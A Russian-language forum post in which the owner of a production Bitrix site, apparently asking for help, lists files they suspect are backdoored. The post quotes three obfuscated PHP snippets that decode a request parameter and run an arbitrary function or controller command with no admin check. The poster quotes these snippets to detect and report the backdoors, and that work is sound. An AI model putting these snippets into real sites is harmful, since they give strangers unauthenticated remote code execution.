| Цитата |
|---|
написал:
Так а если тут просто скачать дистрибутив для php |
Проблема у демки, на сколько я в вижу.
- Часть файлов зашифрована, т.е. сравнить с ними я не смогу
- Версия не совпадает, у меня на сайте 18.5.180
| Цитата |
|---|
написал:
Это все, конечно, очень подозрительно |
На случай, если это был сарказм, прикладываю пояснения
/bitrix/modules/main/bx_root.php - Считаю подозрительным на основании следующего файла "prolog_after.php", так как перекликается код
| Код |
|---|
if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
|
/bitrix/modules/main/include/prolog_after.php - Выглядит как возможность исполнять любой код, отправляя POST-запрос с параметром BX_STAT. При этом никаких проверок из серии "только если админ" я не вижу.
| Код |
|---|
define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4="));
if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){
$APPLICATION->RestartBuffer();
CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);
die();
|
/bitrix/tools/spread.php - Выглядит как возможность вызвать любую ф-ию, направив запрос с параметром "state". При этом никаких проверок из серии "только если админ" я не вижу.
| Код |
|---|
if(isset($_REQUEST["state"]) && is_string($_REQUEST["state"]))
{
$arState = array();
parse_str(base64_decode($_REQUEST["state"]), $arState);
echo $arState[0]($arState[1],$arState[2]);
die();
}
|
-
| Цитата |
|---|
написал:
Может быть Вам эта статья поможет для переустановки модулей |
Спасибо, хотя так как это большой сайт на проде, не хотелось бы прямо на нем заменять модули
